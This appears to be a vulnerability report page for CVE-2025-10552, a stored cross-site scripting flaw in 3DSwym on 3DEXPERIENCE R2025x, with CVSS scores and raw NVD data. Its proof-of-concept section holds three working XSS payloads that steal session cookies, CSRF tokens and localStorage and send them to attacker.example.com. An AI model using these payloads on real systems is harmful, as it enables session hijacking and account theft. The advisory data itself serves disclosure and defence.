Security Vulnerability Report
CVE-2025-10552 CVSS 8.7 HIGH

CVE-2025-10552

Published: 2025-10-13 08:15:38
Last Modified: 2025-12-04 21:40:26

Description

A stored Cross-site Scripting (XSS) vulnerability affecting 3DSwym in 3DSwymer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in a user's browser session.

CVSS Details

CVSS Score: 8.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

(This is the secondary, CNA-supplied score; the primary NVD assessment in the raw JSON below is 6.1 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N.)

Configurations (Affected Products)

cpe:2.3:a:3ds:3dswymer:r2025x:*:*:*:*:*:*:* - VULNERABLE
3DSwym in 3DSwymer on 3DEXPERIENCE R2025x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- Stored XSS PoC for CVE-2025-10552 - 3DSwym in 3DEXPERIENCE R2025x -->
<!-- Attacker injects the following payload into a 3DSwym post/comment/wiki field -->
<script>
  // Steal session cookie and exfiltrate to attacker-controlled server
  var sessionToken = document.cookie;
  var csrfToken = document.querySelector('meta[name="_csrf"]')
    ? document.querySelector('meta[name="_csrf"]').content
    : '';
  var img = new Image();
  img.src = 'https://attacker.example.com/steal?cookie=' + encodeURIComponent(sessionToken)
    + '&csrf=' + encodeURIComponent(csrfToken);
</script>

<!-- Alternative payload using event handler to bypass basic sanitization -->
<svg onload="fetch('https://attacker.example.com/exfil',{method:'POST',body:JSON.stringify({cookies:document.cookie,url:location.href,local:localStorage})})"></svg>

<!-- Alternative payload using img tag with onerror -->
<img src=x onerror="var x=new XMLHttpRequest();x.open('GET','https://attacker.example.com/log?d='+btoa(document.cookie));x.send();">
```

References

https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10552 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10552",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-13T08:15:38.010",
    "lastModified": "2025-12-04T21:40:26.380",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A stored Cross-site Scripting (XSS) vulnerability affecting 3DSwym in 3DSwymer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 5.8
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:3ds:3dswymer:r2025x:*:*:*:*:*:*:*",
                "matchCriteriaId": "DD893EE8-77E1-4790-832D-5AAAB1E8A7F9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10552",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```